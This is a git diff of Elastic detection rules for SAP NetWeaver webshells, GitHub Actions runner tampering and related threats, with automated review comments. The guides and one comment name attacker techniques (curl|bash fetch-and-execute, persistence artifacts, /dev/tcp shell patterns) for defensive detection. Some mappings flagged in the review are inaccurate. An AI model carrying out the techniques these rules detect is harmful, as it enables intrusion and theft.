b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml new file mode 100644 index 00000000000..a9a731ace09 --- /dev/null +++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml 
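Review bot: `zmodload` in the `process.name` list of the query is a zsh builtin that loads `zsh/net/tcp`, so it is unlikely to appear as a process name; it would surface in `process.args`/`process.command_line` of a `zsh` process, which the `*zsh/net/tcp*` and `*zsh/net/udp*` argument patterns already cover, so the entry is dead weight and slightly misleading. The exclusion list hard-codes site-specific hostnames (`sirh_db`, `remoteiot.com`, `elk.stag.one`, `kafka`, `itom-vault`) into a shared production rule; those belong in per-deployment exceptions, since nothing guarantees `*/dev/tcp/kafka/*` is benign in every environment. The `#### Possible investigation steps` heading uses four hashes while the sibling rules use three, and this new file carries `updated_date = "2024/09/23"` with no `min_stack_version`, which again reads as a move rather than new content.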
@@ -0,0 +1,90 @@
+[metadata]
+creation_date = "2025/04/26"
+integration = ["endpoint"]
+maturity = "production"
+updated_date = "2025/04/26"
+
+[rule]
+author = ["Elastic"]
+description = """
+Identifies suspicious Java file creation in the IRJ directory of the SAP NetWeaver application. This may indicate an attempt to deploy a webshell.
+"""
+from = "now-9m"
+index = ["auditbeat-*", "logs-endpoint.events.file*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential SAP NetWeaver WebShell Creation"
+references = [
+ "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/",
+ "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
+]
+risk_score = 73
+rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5"
+severity = "high"
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
+timestamp_override = "event.ingested"
+type = "eql"
+
+query = '''
+file where host.os.type in ("linux", "windows") and event.action == "creation" and
+ file.extension : ("jsp", "java", "class") and
+ file.path : ("/*/sap.com/*/servlet_jsp/irj/root/*",
+ "/*/sap.com/*/servlet_jsp/irj/work/*",
+ "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\root\\*",
+ "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\work\\*")
+'''
+note = """## Triage and analysis
+
+### Investigating Potential SAP NetWeaver WebShell Creation
+
+### Possible investigation steps
+
+- Examine the file creation event and the associated HTTP post request logs details to identify the source of the creation.
+- Examine the process tree to verify the parent-child relationship between the Java process and any suspicious child processes such as shell scripts or scripting languages (e.g., sh, bash, curl, python).
+- Check the command line arguments and environment variables of the suspicious child processes to identify any potentially malicious payloads or commands being executed.
+- Investigate the host's recent activity and logs for any other indicators of compromise or unusual behavior that might correlate with the suspected exploitation attempt.
+- Assess the system for any unauthorized changes or new files that may have been introduced as a result of the exploitation attempt, focusing on JSP files under the IRJ root directory.
+
+
+### Response and remediation
+
+- Immediately isolate the affected host from the network to prevent further outbound connections and potential lateral movement.
+- Terminate any suspicious Java processes identified in the alert, especially those making outbound connections to LDAP, RMI, or DNS ports.
+- Conduct a thorough review of the affected system for any unauthorized changes or additional malicious processes, focusing on child processes like shell scripts or scripting languages.
+- Restore the affected system from a known good backup if unauthorized changes or malware are detected.
+- Update and patch Java and any related applications to the latest versions to mitigate known vulnerabilities.
+- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network."""
+
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
+
+
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
index da67ad548c5..ac4891f7ad4
--- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
+++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/04/26"
 [rule]
 author = ["Elastic"]
@@ -21,7 +21,16 @@ references = [
 risk_score = 73
 rule_id = "23c53c4c-aa8b-4b07-85c0-fe46a9c8acaf"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
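Review bot: The threat mapping at the end of the new file pairs `.jsp`/`.java`/`.class` file creation with sub-technique T1059.007 (JavaScript) and T1203 (Exploitation for Client Execution), neither of which describes what the query detects: JSP is server-side Java, and the description's own wording ("deploy a webshell") is the Persistence technique T1505.003 (Web Shell), with T1190 (Exploit Public-Facing Application) for the foothold — both ids appear elsewhere in this commit. The `### Investigating Potential SAP NetWeaver WebShell Creation` heading has no body, and the remediation bullets about Java processes "making outbound connections to LDAP, RMI, or DNS ports" and patching Java read as carried over from a Log4j-style rule rather than written for SAP NetWeaver file creation. If the mapping is changed, the `Tactic:` tags must follow it; the tags list currently carries only `Tactic: Execution`.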
@@ -75,64 +84,24 @@ note = """## Triage and analysis
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.006"
-name = "Python"
-reference = "https://attack.mitre.org/techniques/T1059/006/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
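Review bot: The new side replaces the PowerShell/Windows Command Shell/Unix Shell/Python sub-techniques with T1059.007 (JavaScript) and deletes the T1190 (Initial Access) and T1505.003 Web Shell (Persistence) entries for a rule that, by its file name and note, detects webshell execution — JavaScript is the least applicable T1059 sub-technique here and Web Shell was the most specific mapping the rule had. The same JavaScript-for-Unix-Shell substitution and T1190 removal appear in the `execution_suspicious_java_netcon_childproc.toml` hunk further down. The earlier hunk in this file also moves `updated_date` backwards from `2026/03/23` to `2025/04/26` while the rule's content changes, as do the `updated_date` hunks of every other file in this chunk, which suggests these hunks were produced against a stale base rather than intended; please confirm the direction of the change before merging. If the reduction is intended, the dropped `Tactic: Initial Access` and `Tactic: Persistence` tags in the preceding hunk are consistent with it.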
diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
index b204ba78215..8ca0cdb5a1f
--- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
+++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/12/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/27"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,16 @@ references = [
 risk_score = 73
 rule_id = "c3f5e1d8-910e-43b4-8d44-d748e498ca86"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -100,31 +109,24 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
+
+
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml
index 970fad9a796..08782e87f48
--- a/rules/cross-platform/execution_via_github_actions_runner.toml
+++ b/rules/cross-platform/execution_via_github_actions_runner.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/26"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/26"
 [rule]
 author = ["Elastic"]
@@ -65,7 +65,24 @@ references = [
 risk_score = 47
 rule_id = "a640ef5b-e1da-4b17-8391-468fdbd1b517"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: Windows",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Data Source: Auditd Manager",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -82,48 +99,32 @@ process where event.type == "start" and event.action in ("exec", "exec_event", "
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.002"
-name = "AppleScript"
-reference = "https://attack.mitre.org/techniques/T1059/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
 [[rule.threat.technique.subtechnique]]
-id = "T1059.006"
-name = "Python"
-reference = "https://attack.mitre.org/techniques/T1059/006/"
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.007"
-name = "JavaScript"
-reference = "https://attack.mitre.org/techniques/T1059/007/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.011"
-name = "Lua"
-reference = "https://attack.mitre.org/techniques/T1059/011/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
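Review bot: The new Initial Access entry maps T1195.002 (Compromise Software Supply Chain), while the sibling rule added in this commit for the same GitHub Actions runner context (`execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml`) maps T1195.001 (Compromise Software Dependencies and Development Tools); pick one sub-technique for runner abuse or state why they differ, otherwise the two rules look inconsistent to anyone pivoting on the technique id. The new `[[rule.threat]]` table follows the Execution tactic's `reference` line with no separating blank line, and a stray blank line is added after the final `reference`, whereas the rest of this file's tables are separated by exactly one blank line. The hunk also drops every T1059 sub-technique (PowerShell, AppleScript, Windows Command Shell, Unix Shell, Python, JavaScript, Lua) from a rule whose query, per the hunk header, matches `exec` events and whose tags cover Linux, Windows and macOS, which reads as a loss of specificity rather than a correction.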
diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
new file mode 100644
index 00000000000..ebd0cb49ce7
--- /dev/null
+++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
@@ -0,0 +1,163 @@
+[metadata]
+creation_date = "2025/11/27"
+integration = ["endpoint"]
+maturity = "production"
+updated_date = "2025/11/27"
+
+[rule]
+author = ["Elastic"]
+description = """
+This rule detects processes spawned by GitHub Actions runners where "RUNNER_TRACKING_ID" is overridden from its
+default "github_*" value. Such tampering has been associated with attempts to evade runner tracking/cleanup on
+self-hosted runners, including behavior observed in the Shai-Hulud 2.0 npm worm campaign.
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.process*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners"
+note = """## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+### Investigating Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners
+
+This rule surfaces processes launched by GitHub Actions runners where RUNNER_TRACKING_ID is deliberately set to a non-default value. Attackers do this to break runner job tracking and cleanup on self-hosted runners, enabling long‑lived or hidden workloads. A common pattern is a workflow step that exports a custom RUNNER_TRACKING_ID and then spawns bash or node to fetch and execute a script via curl|bash or npm install scripts, keeping the process alive after the job finishes to run mining or exfil tasks.
+
+### Possible investigation steps
+
+- Correlate the event to its GitHub Actions run/job and workflow YAML, identify the repository and actor (commit/PR), and verify whether RUNNER_TRACKING_ID was explicitly set in the workflow or injected by a step script.
+- On the runner host, determine if the spawned process persisted beyond job completion by checking for orphaning or reparenting to PID 1, sustained CPU/memory usage, and timestamps relative to the runner process exit.
+- Review nearby telemetry for fetch-and-execute patterns (curl|bash, wget, node/npm lifecycle scripts), unexpected file writes under /tmp or actions-runner/_work, and outbound connections to non-GitHub endpoints.
+- Enumerate persistence artifacts created during the run, including crontab entries, systemd unit files, pm2 or nohup sessions, and changes to authorized_keys or rc.local, and tie them back to the suspicious process.
+- Assess blast radius by listing secrets and tokens available to the job, checking audit logs for their subsequent use from the runner IP or unusual repositories, and decide whether to revoke or rotate credentials.
+
+### False positive analysis
+
+- A self-hosted runner bootstrap script or base image intentionally sets a fixed RUNNER_TRACKING_ID for internal log correlation or debugging, causing all runner-spawned processes to inherit a non-github_* value.
+- A composite action or reusable workflow accidentally overrides RUNNER_TRACKING_ID through env mapping or variable expansion (for example templating it from the run ID), resulting in benign non-default values during standard jobs.
+
+### Response and remediation
+
+- Quarantine the self-hosted runner by stopping Runner.Listener, removing the runner from the repository/organization, and terminating any Runner.Worker children or orphaned processes (PID 1) that carry a non-default RUNNER_TRACKING_ID.
+- Purge persistence by removing artifacts created during the run, including systemd unit files under /etc/systemd/system, crontab entries in /var/spool/cron, pm2/nohup sessions, edits to ~/.ssh/authorized_keys or /etc/rc.local, and files under /tmp and actions-runner/_work linked to the tampered process.
+- Revoke and rotate credentials exposed to the job (GITHUB_TOKEN, personal access tokens, cloud keys), delete leftover containers and caches in actions-runner/_work, invalidate the runner registration, and redeploy the runner from a clean, patched image.
+- Escalate to incident response if you observe outbound connections to non-GitHub endpoints, processes persisting after job completion, modifications to ~/.ssh/authorized_keys or /etc/systemd/system, or repeated RUNNER_TRACKING_ID tampering across runners or repositories.
+- Harden by restricting self-hosted runners to trusted repositories and actors, enforcing ephemeral per-job runners with egress allowlisting to github.com, setting strict job timeouts, and adding a workflow guard step that exits if RUNNER_TRACKING_ID does not start with github_."""
+references = [
+ "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise",
+ "https://socket.dev/blog/shai-hulud-strikes-again-v2",
+ "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
+ "https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/",
+]
+risk_score = 47
+rule_id = "df0553c8-2296-45ef-b4dc-3b88c4c130a7"
+setup = """## Setup
+
+This rule requires data coming in from Elastic Defend.
+
+### Elastic Defend Integration Setup
+Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.
+
+#### Prerequisite Requirements:
+- Fleet is required for Elastic Defend.
+- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).
+
+#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:
+- Go to the Kibana home page and click "Add integrations".
+- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
+- Click "Add Elastic Defend".
+- Configure the integration name and optionally add a description.
+- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads".
+- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).
+- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
+- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
+For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).
+- Click "Save and Continue".
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
+For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
+
+Elastic Defend integration does not collect environment variable logging by default.
+In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.
+ #### To set up environment variable capture for an Elastic Agent policy:
+- Go to “Security → Manage → Policies”.
+- Select an “Elastic Agent policy”.
+- Click “Show advanced settings”.
+- Scroll down or search for “linux.advanced.capture_env_vars”.
+- Enter the names of environment variables you want to capture, separated by commas.
+- For Linux, this rule requires the linux.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID".
+- For macOS, this rule requires the macos.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID".
+- Click “Save”.
+After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.
+For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).
+"""
+severity = "medium"
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Initial Access",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
+timestamp_override = "event.ingested"
+type = "eql"
+query = '''
+process where host.os.type in ("linux", "macos") and event.type == "start" and event.action == "exec" and
+process.parent.name in ("Runner.Worker", "Runner.Listener") and process.env_vars like~ "RUNNER_TRACKING_ID*" and
+not process.env_vars like~ "RUNNER_TRACKING_ID=github_*"
+'''
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Execution"
+ id = "TA0002"
+ reference = "https://attack.mitre.org/tactics/TA0002/"
+
+ [[rule.threat.technique]]
+ id = "T1059"
+ name = "Command and Scripting Interpreter"
+ reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Initial Access"
+ id = "TA0001"
+ reference = "https://attack.mitre.org/tactics/TA0001/"
+
+ [[rule.threat.technique]]
+ name = "Supply Chain Compromise"
+ id = "T1195"
+ reference = "https://attack.mitre.org/techniques/T1195/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Compromise Software Dependencies and Development Tools"
+ id = "T1195.001"
+ reference = "https://attack.mitre.org/techniques/T1195/001/"
+
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Defense Evasion"
+ id = "TA0005"
+ reference = "https://attack.mitre.org/tactics/TA0005/"
+
+ [[rule.threat.technique]]
+ name = "Impair Defenses"
+ id = "T1562"
+ reference = "https://attack.mitre.org/techniques/T1562/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Disable or Modify Tools"
+ id = "T1562.001"
+ reference = "https://attack.mitre.org/techniques/T1562/001/"
diff --git a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml
index 3d12517555c..a0c85693771
--- a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml
+++ b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2026/01/26"
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/09"
 [rule]
 author = ["Elastic"]
@@ -125,3 +125,10 @@ post-compromise activity.
 - Monitor the environment for recurrence of similar high-CPU processes combined with security alerts.
 - Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml
index 814bf8f4631..a62746b856a
--- a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml
+++ b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2026/01/26"
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/26"
 [rule]
 author = ["Elastic"]
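Review bot: The query at the end of the new rule matches only when `RUNNER_TRACKING_ID` is present with a value that does not start with `github_`; a runner child process whose captured environment lacks the variable entirely does not match, while the hardening step in the note (a guard that exits unless the variable starts with `github_`) does cover that case. State the asymmetry in the note, for example under `### False positive analysis` or a short limitations paragraph: `This rule requires RUNNER_TRACKING_ID to be captured and present on the process; events where the variable is absent are not alerted on.` Two smaller points in the `setup` text: the heading `#### To set up environment variable capture for an Elastic Agent policy:` is indented by one space unlike every other heading, and the agent-policy link pins `fleet/8.10` while the neighbouring links use `current`.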
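Review bot: The `[[rule.threat]]` entry appended to `impact_alert_from_a_process_with_cpu_spike.toml` carries a tactic (TA0040 Impact) with no `[[rule.threat.technique]]`, and the next file section strips T1496/T1496.001 from `impact_alerts_on_host_with_cpu_spike.toml`, leaving that rule tactic-only as well. A tactic-only entry appears to be accepted by the schema, but both rules are about CPU spikes, for which T1496 (Resource Hijacking) was the concrete mapping, so the second removal looks like a loss rather than a cleanup. The tags hunk for the first file is not in this chunk; confirm its list carries `Tactic: Impact`, otherwise the tag/tactic consistency this commit is introducing will fail for it.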
@@ -127,16 +127,6 @@ within a short time window. This combination may indicate malicious execution, r
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1496"
-name = "Resource Hijacking"
-reference = "https://attack.mitre.org/techniques/T1496/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1496.001"
-name = "Compute Hijacking"
-reference = "https://attack.mitre.org/techniques/T1496/001/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml
index 7f45c3c1b83..0c42ed1077a
--- a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml
+++ b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["azure", "o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -59,7 +59,20 @@ The Azure Fleet integration, Office 365 Logs Fleet integration, Filebeat module,
 risk_score = 73
 rule_id = "f0cc239b-67fa-46fc-89d4-f861753a40f5"
 severity = "high"
-tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"]
+tags = [
+ "Domain: Cloud",
+ "Domain: SaaS",
+ "Data Source: Azure",
+ "Data Source: Entra ID",
+ "Data Source: Entra ID Sign-in Logs",
+ "Data Source: Microsoft 365",
+ "Data Source: Microsoft 365 Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Resources: Investigation Guide",
+ "Rule Type: Higher-Order Rule",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -111,36 +124,14 @@ from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1114"
-name = "Email Collection"
-reference = "https://attack.mitre.org/techniques/T1114/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1114.002"
-name = "Remote Email Collection"
-reference = "https://attack.mitre.org/techniques/T1114/002/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
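Review bot: The threat hunk removes the T1078.004 (Cloud Accounts) sub-technique and keeps only the parent T1078 (Valid Accounts) for a rule that, per its tags, is built on Entra ID sign-in logs and Microsoft 365 audit logs; Cloud Accounts is the sub-technique that describes exactly those logins, so dropping it loses precision without a stated reason. The Collection entry (T1114.002 Remote Email Collection) is removed together with its `Tactic: Collection` tag in the tags hunk, which is self-consistent, but it is a scope change and should be called out in the PR description. The hunk also ends by adding a blank line after the last `reference`, leaving a trailing empty line at end of file.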
diff --git a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml
index a3a7976428f..9bf079851a4
